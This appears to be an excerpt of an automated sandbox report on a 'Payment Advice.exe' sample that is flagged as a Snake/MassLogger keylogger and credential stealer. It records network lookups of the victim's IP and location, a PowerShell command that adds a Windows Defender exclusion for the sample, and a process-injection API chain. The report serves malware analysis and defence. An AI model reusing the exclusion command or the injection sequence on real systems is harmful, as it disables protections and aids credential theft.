                                                                      Mar 5, 2025 13:08:21.931046963 CET1.1.1.1192.168.2.40xb9aeNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                      Mar 5, 2025 13:08:21.931046963 CET1.1.1.1192.168.2.40xb9aeNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                      Mar 5, 2025 13:08:21.931046963 CET1.1.1.1192.168.2.40xb9aeNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                      Mar 5, 2025 13:08:21.931046963 CET1.1.1.1192.168.2.40xb9aeNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                      Mar 5, 2025 13:08:21.931046963 CET1.1.1.1192.168.2.40xb9aeNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                      Mar 5, 2025 13:08:21.931046963 CET1.1.1.1192.168.2.40xb9aeNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                      Mar 5, 2025 13:08:21.931046963 CET1.1.1.1192.168.2.40xb9aeNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • reallyfreegeoip.org
                                                                      • checkip.dyndns.org

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.449733132.226.247.73805216C:\Users\user\Desktop\Payment Advice.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Mar 5, 2025 13:08:20.190440893 CET151OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Connection: Keep-Alive
                                                                      Mar 5, 2025 13:08:20.889595032 CET273INHTTP/1.1 200 OK
                                                                      Date: Wed, 05 Mar 2025 12:08:20 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 104
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                      Mar 5, 2025 13:08:20.892961979 CET127OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Mar 5, 2025 13:08:21.109308958 CET273INHTTP/1.1 200 OK
                                                                      Date: Wed, 05 Mar 2025 12:08:21 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 104
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                      HTTPS Proxied Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.449735104.21.80.14435216C:\Users\user\Desktop\Payment Advice.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-05 12:08:22 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      Connection: Keep-Alive
                                                                      2025-03-05 12:08:22 UTC854INHTTP/1.1 200 OK
                                                                      Date: Wed, 05 Mar 2025 12:08:22 GMT
                                                                      Content-Type: text/xml
                                                                      Content-Length: 362
                                                                      Connection: close
                                                                      Cf-Ray: 91b97f94c9cf42d2-EWR
                                                                      Server: cloudflare
                                                                      Age: 262245
                                                                      Cache-Control: max-age=31536000
                                                                      Cf-Cache-Status: HIT
                                                                      Last-Modified: Sun, 02 Mar 2025 11:17:37 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lD1DVdJpPxYKq6MDQyvyJjZH7LcYmvy4iOuqJlLHbYu9rr0%2F0wEmqO1SyVrQSY2i8n8LWpBdX%2FghvMcBRqWBJLW%2BhI8ZdOYPzBuC5kOCibbjsGmJuRD559ZBpeZUbBwQfoHzWYsC"}],"group":"cf-nel","max_age":604800}
                                                                      Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1544&min_rtt=1535&rtt_var=594&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1815920&cwnd=168&unsent_bytes=0&cid=be32be1beeeffcaa&ts=201&x=0"
                                                                      2025-03-05 12:08:22 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:07:08:16
                                                                      Start date:05/03/2025
                                                                      Path:C:\Users\user\Desktop\Payment Advice.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\Payment Advice.exe"
                                                                      Imagebase:0xa20000
                                                                      File size:594'432 bytes
                                                                      MD5 hash:78EC5A1E11EE68C95A5E339FD492C90E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:2
                                                                      Start time:07:08:18
                                                                      Start date:05/03/2025
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe"
                                                                      Imagebase:0x890000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:3
                                                                      Start time:07:08:18
                                                                      Start date:05/03/2025
                                                                      Path:C:\Users\user\Desktop\Payment Advice.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Users\user\Desktop\Payment Advice.exe"
                                                                      Imagebase:0x270000
                                                                      File size:594'432 bytes
                                                                      MD5 hash:78EC5A1E11EE68C95A5E339FD492C90E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:4
                                                                      Start time:07:08:18
                                                                      Start date:05/03/2025
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:5
                                                                      Start time:07:08:18
                                                                      Start date:05/03/2025
                                                                      Path:C:\Users\user\Desktop\Payment Advice.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\Payment Advice.exe"
                                                                      Imagebase:0xe60000
                                                                      File size:594'432 bytes
                                                                      MD5 hash:78EC5A1E11EE68C95A5E339FD492C90E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2996681350.0000000003523000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:false

                                                                      Disassembly

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:8.4%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:221
                                                                        Total number of Limit Nodes:12
                                                                        execution_graph 41270 110d360 41271 110d3a6 GetCurrentProcess 41270->41271 41273 110d3f1 41271->41273 41274 110d3f8 GetCurrentThread 41271->41274 41273->41274 41275 110d435 GetCurrentProcess 41274->41275 41276 110d42e 41274->41276 41277 110d46b 41275->41277 41276->41275 41278 110d493 GetCurrentThreadId 41277->41278 41279 110d4c4 41278->41279 41110 5fc3cb8 41111 5fc3d06 DrawTextExW 41110->41111 41113 5fc3d5e 41111->41113 41280 796bca0 41281 796be2b 41280->41281 41282 796bcc6 41280->41282 41282->41281 41288 796bfc0 41282->41288 41293 796c049 41282->41293 41298 796bf18 41282->41298 41301 796bfbc 41282->41301 41306 796bf20 41282->41306 41290 796bfc4 41288->41290 41289 796bf62 PostMessageW 41291 796bf8c 41289->41291 41290->41289 41292 796bfe4 41290->41292 41291->41282 41295 796bfc4 41293->41295 41294 796bf62 PostMessageW 41296 796bf8c 41294->41296 41295->41294 41297 796bfe4 41295->41297 41296->41282 41299 796bf62 PostMessageW 41298->41299 41300 796bf8c 41299->41300 41300->41282 41302 796bfc4 41301->41302 41303 796bf62 PostMessageW 41302->41303 41305 796bfe4 41302->41305 41304 796bf8c 41303->41304 41304->41282 41307 796bf62 PostMessageW 41306->41307 41308 796bf8c 41307->41308 41308->41282 41309 110d5a8 DuplicateHandle 41310 110d63e 41309->41310 41311 1104668 41312 110467a 41311->41312 41313 1104686 41312->41313 41317 1104778 41312->41317 41322 1103e28 41313->41322 41315 11046a5 41318 110479d 41317->41318 41326 1104878 41318->41326 41330 1104888 41318->41330 41323 1103e33 41322->41323 41338 1105cdc 41323->41338 41325 1106ffb 41325->41315 41328 1104888 41326->41328 41327 110498c 41327->41327 41328->41327 41334 11044b0 41328->41334 41331 11048af 41330->41331 41332 11044b0 CreateActCtxA 41331->41332 41333 110498c 41331->41333 41332->41333 41335 1105918 CreateActCtxA 41334->41335 41337 11059db 41335->41337 41339 1105ce7 41338->41339 41342 1105cfc 41339->41342 41341 11071ad 41341->41325 41343 1105d07 41342->41343 41346 1105d2c 41343->41346 41345 1107282 41345->41341 41347 1105d37 41346->41347 41350 1105d5c 41347->41350 41349 1107385 41349->41345 41351 1105d67 41350->41351 41353 11088eb 41351->41353 41357 110ab92 41351->41357 41352 1108929 41352->41349 41353->41352 41361 110cc80 41353->41361 41366 110cc90 41353->41366 41371 110afc0 41357->41371 41375 110afd0 41357->41375 41358 110aba6 41358->41353 41362 110cc8e 41361->41362 41363 110ccd5 41362->41363 41383 110d248 41362->41383 41387 110d239 41362->41387 41363->41352 41367 110cc9b 41366->41367 41368 110ccd5 41367->41368 41369 110d248 GetModuleHandleW 41367->41369 41370 110d239 GetModuleHandleW 41367->41370 41368->41352 41369->41368 41370->41368 41372 110afcd 41371->41372 41378 110b0c8 41372->41378 41373 110afdf 41373->41358 41377 110b0c8 GetModuleHandleW 41375->41377 41376 110afdf 41376->41358 41377->41376 41379 110b0fc 41378->41379 41380 110b0d9 41378->41380 41379->41373 41380->41379 41381 110b300 GetModuleHandleW 41380->41381 41382 110b32d 41381->41382 41382->41373 41385 110d255 41383->41385 41384 110d28f 41384->41363 41385->41384 41391 110d040 41385->41391 41389 110d248 41387->41389 41388 110d28f 41388->41363 41389->41388 41390 110d040 GetModuleHandleW 41389->41390 41390->41388 41392 110d045 41391->41392 41394 110dba0 41392->41394 41395 110d16c 41392->41395 41394->41394 41396 110d177 41395->41396 41397 1105d5c GetModuleHandleW 41396->41397 41398 110dc0f 41397->41398 41398->41394 41114 7969b4c 41115 796996c 41114->41115 41116 7969aa2 41115->41116 41120 796aa16 41115->41120 41136 796a9a0 41115->41136 41151 796a9b0 41115->41151 41121 796a9a4 41120->41121 41122 796aa19 41120->41122 41130 796a9d2 41121->41130 41166 796afb5 41121->41166 41171 796afe9 41121->41171 41175 796b149 41121->41175 41180 796b02b 41121->41180 41185 796ae85 41121->41185 41189 796b246 41121->41189 41193 796b498 41121->41193 41198 796adbb 41121->41198 41203 796b51a 41121->41203 41207 796b21d 41121->41207 41212 796afdd 41121->41212 41217 796b45f 41121->41217 41122->41116 41130->41116 41137 796a9a5 41136->41137 41138 796afb5 2 API calls 41137->41138 41139 796b45f 2 API calls 41137->41139 41140 796afdd 2 API calls 41137->41140 41141 796b21d 2 API calls 41137->41141 41142 796b51a 2 API calls 41137->41142 41143 796adbb 2 API calls 41137->41143 41144 796b498 2 API calls 41137->41144 41145 796b246 2 API calls 41137->41145 41146 796a9d2 41137->41146 41147 796ae85 2 API calls 41137->41147 41148 796b02b 2 API calls 41137->41148 41149 796b149 2 API calls 41137->41149 41150 796afe9 2 API calls 41137->41150 41138->41146 41139->41146 41140->41146 41141->41146 41142->41146 41143->41146 41144->41146 41145->41146 41146->41116 41147->41146 41148->41146 41149->41146 41150->41146 41152 796a9ca 41151->41152 41153 796afb5 2 API calls 41152->41153 41154 796b45f 2 API calls 41152->41154 41155 796afdd 2 API calls 41152->41155 41156 796b21d 2 API calls 41152->41156 41157 796b51a 2 API calls 41152->41157 41158 796adbb 2 API calls 41152->41158 41159 796b498 2 API calls 41152->41159 41160 796a9d2 41152->41160 41161 796b246 2 API calls 41152->41161 41162 796ae85 2 API calls 41152->41162 41163 796b02b 2 API calls 41152->41163 41164 796b149 2 API calls 41152->41164 41165 796afe9 2 API calls 41152->41165 41153->41160 41154->41160 41155->41160 41156->41160 41157->41160 41158->41160 41159->41160 41160->41116 41161->41160 41162->41160 41163->41160 41164->41160 41165->41160 41167 796afc5 41166->41167 41222 79692c2 41167->41222 41226 79692c8 41167->41226 41168 796b85f 41230 7968cf0 41171->41230 41234 7968cf8 41171->41234 41172 796b003 41172->41130 41176 796b160 41175->41176 41238 7968c40 41176->41238 41242 7968c48 41176->41242 41177 796b4fb 41177->41130 41181 796b04c 41180->41181 41182 796aee6 41181->41182 41183 79692c2 WriteProcessMemory 41181->41183 41184 79692c8 WriteProcessMemory 41181->41184 41182->41130 41183->41181 41184->41181 41246 7969546 41185->41246 41250 7969550 41185->41250 41191 79692c2 WriteProcessMemory 41189->41191 41192 79692c8 WriteProcessMemory 41189->41192 41190 796b233 41191->41190 41192->41190 41195 796b45e 41193->41195 41194 796b66f 41195->41193 41195->41194 41196 7968cf0 Wow64SetThreadContext 41195->41196 41197 7968cf8 Wow64SetThreadContext 41195->41197 41196->41195 41197->41195 41199 796adbf 41198->41199 41200 796aebb 41199->41200 41201 7969546 CreateProcessA 41199->41201 41202 7969550 CreateProcessA 41199->41202 41200->41130 41201->41200 41202->41200 41254 7969200 41203->41254 41258 7969208 41203->41258 41204 796b538 41208 796b04c 41207->41208 41208->41207 41209 796aee6 41208->41209 41210 79692c2 WriteProcessMemory 41208->41210 41211 79692c8 WriteProcessMemory 41208->41211 41209->41130 41210->41208 41211->41208 41213 796b0bb 41212->41213 41262 79693b8 41213->41262 41266 79693b2 41213->41266 41214 796b0dd 41214->41130 41220 7968cf0 Wow64SetThreadContext 41217->41220 41221 7968cf8 Wow64SetThreadContext 41217->41221 41218 796b45e 41218->41217 41219 796b66f 41218->41219 41220->41218 41221->41218 41223 79692c8 WriteProcessMemory 41222->41223 41225 7969367 41223->41225 41225->41168 41227 7969310 WriteProcessMemory 41226->41227 41229 7969367 41227->41229 41229->41168 41231 7968cf8 Wow64SetThreadContext 41230->41231 41233 7968d85 41231->41233 41233->41172 41235 7968d3d Wow64SetThreadContext 41234->41235 41237 7968d85 41235->41237 41237->41172 41239 7968c48 ResumeThread 41238->41239 41241 7968cb9 41239->41241 41241->41177 41243 7968c88 ResumeThread 41242->41243 41245 7968cb9 41243->41245 41245->41177 41247 79695d9 CreateProcessA 41246->41247 41249 796979b 41247->41249 41251 79695d9 CreateProcessA 41250->41251 41253 796979b 41251->41253 41255 7969248 VirtualAllocEx 41254->41255 41257 7969285 41255->41257 41257->41204 41259 7969248 VirtualAllocEx 41258->41259 41261 7969285 41259->41261 41261->41204 41263 7969403 ReadProcessMemory 41262->41263 41265 7969447 41263->41265 41265->41214 41267 79693b8 ReadProcessMemory 41266->41267 41269 7969447 41267->41269 41269->41214

                                                                        Executed Functions

                                                                        Function 079636B2 Relevance: .1, Instructions: 61COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1767590838.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7960000_Payment Advice.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 053ef30d94b00caddd73067feefae5fd4202875ed15a0c25d8f7b1453d56a9f7
                                                                        • Instruction ID: 61766a9a84888898b1b152078e78b81eaeeeedd0aefda74238dafdb52af124f3
                                                                        • Opcode Fuzzy Hash: 053ef30d94b00caddd73067feefae5fd4202875ed15a0c25d8f7b1453d56a9f7
                                                                        • Instruction Fuzzy Hash: CA213AB1E0561A8BDB18CF67C9056EEFFFBAFCA300F04D17AD409A6664DB7405468A90
                                                                        Function 0110D350 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 294 110d350-110d3ef GetCurrentProcess 299 110d3f1-110d3f7 294->299 300 110d3f8-110d42c GetCurrentThread 294->300 299->300 301 110d435-110d469 GetCurrentProcess 300->301 302 110d42e-110d434 300->302 303 110d472-110d48d call 110d530 301->303 304 110d46b-110d471 301->304 302->301 308 110d493-110d4c2 GetCurrentThreadId 303->308 304->303 309 110d4c4-110d4ca 308->309 310 110d4cb-110d52d 308->310 309->310
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 0110D3DE
                                                                        • GetCurrentThread.KERNEL32 ref: 0110D41B
                                                                        • GetCurrentProcess.KERNEL32 ref: 0110D458
                                                                        • GetCurrentThreadId.KERNEL32 ref: 0110D4B1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1761719665.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1100000_Payment Advice.jbxd
                                                                        Similarity
                                                                        • API ID: Current$ProcessThread
                                                                        • String ID:
                                                                        • API String ID: 2063062207-0
                                                                        • Opcode ID: 797919f943004a8b39242b229f0df97fe892c4a2866eccc7ccdc4ed12ae591e3
                                                                        • Instruction ID: 0c72a41247eca3107931b6d98ea41c83f3b9def7df503a8021f3d403d7985196
                                                                        • Opcode Fuzzy Hash: 797919f943004a8b39242b229f0df97fe892c4a2866eccc7ccdc4ed12ae591e3
                                                                        • Instruction Fuzzy Hash: 5A5166B09012498FDB18CFAAD948BEEBFF1EF88314F248459E409A7390DB746940CF65
                                                                        Function 0110D360 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 317 110d360-110d3ef GetCurrentProcess 321 110d3f1-110d3f7 317->321 322 110d3f8-110d42c GetCurrentThread 317->322 321->322 323 110d435-110d469 GetCurrentProcess 322->323 324 110d42e-110d434 322->324 325 110d472-110d48d call 110d530 323->325 326 110d46b-110d471 323->326 324->323 330 110d493-110d4c2 GetCurrentThreadId 325->330 326->325 331 110d4c4-110d4ca 330->331 332 110d4cb-110d52d 330->332 331->332
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 0110D3DE
                                                                        • GetCurrentThread.KERNEL32 ref: 0110D41B
                                                                        • GetCurrentProcess.KERNEL32 ref: 0110D458
                                                                        • GetCurrentThreadId.KERNEL32 ref: 0110D4B1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1761719665.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1100000_Payment Advice.jbxd
                                                                        Similarity
                                                                        • API ID: Current$ProcessThread
                                                                        • String ID:
                                                                        • API String ID: 2063062207-0
                                                                        • Opcode ID: ac311e0f50c8221b859abd56f3fbfa9f4ab79a8a95607b2c476b3cedb83c884b
                                                                        • Instruction ID: 06e103be6d275585430db852616f7079a153a2db81c474096b7446a0c903b31c
                                                                        • Opcode Fuzzy Hash: ac311e0f50c8221b859abd56f3fbfa9f4ab79a8a95607b2c476b3cedb83c884b
                                                                        • Instruction Fuzzy Hash: 4B5154B0D012498FDB18CFAAD948BEEBFF1EF88314F248459E409A7390DB746844CB61
                                                                        Function 07969546 Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 457 7969546-79695e5 459 79695e7-79695f1 457->459 460 796961e-796963e 457->460 459->460 461 79695f3-79695f5 459->461 467 7969677-79696a6 460->467 468 7969640-796964a 460->468 462 79695f7-7969601 461->462 463 7969618-796961b 461->463 465 7969605-7969614 462->465 466 7969603 462->466 463->460 465->465 469 7969616 465->469 466->465 474 79696df-7969799 CreateProcessA 467->474 475 79696a8-79696b2 467->475 468->467 470 796964c-796964e 468->470 469->463 472 7969650-796965a 470->472 473 7969671-7969674 470->473 476 796965e-796966d 472->476 477 796965c 472->477 473->467 488 79697a2-7969828 474->488 489 796979b-79697a1 474->489 475->474 478 79696b4-79696b6 475->478 476->476 479 796966f 476->479 477->476 480 79696b8-79696c2 478->480 481 79696d9-79696dc 478->481 479->473 483 79696c6-79696d5 480->483 484 79696c4 480->484 481->474 483->483 485 79696d7 483->485 484->483 485->481 499 796982a-796982e 488->499 500 7969838-796983c 488->500 489->488 499->500 501 7969830 499->501 502 796983e-7969842 500->502 503 796984c-7969850 500->503 501->500 502->503 504 7969844 502->504 505 7969852-7969856 503->505 506 7969860-7969864 503->506 504->503 505->506 509 7969858 505->509 507 7969876-796987d 506->507 508 7969866-796986c 506->508 510 7969894 507->510 511 796987f-796988e 507->511 508->507 509->506 513 7969895 510->513 511->510 513->513
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07969786
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1767590838.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7960000_Payment Advice.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: 1bb8f596afef2736e0fa96eda9e0a98ed27d88ec0902ace18492dbbd0ef33415
                                                                        • Instruction ID: 86fff997d5e167c486af87c8fe4cc7ea99b9142a2ad30284786fb4cb064b91ca
                                                                        • Opcode Fuzzy Hash: 1bb8f596afef2736e0fa96eda9e0a98ed27d88ec0902ace18492dbbd0ef33415
                                                                        • Instruction Fuzzy Hash: ABA15CB1D0075ADFDB24CF69C845BEDBBB6BF48324F048269D809A7240DB74A985CF91
                                                                        Function 07969550 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
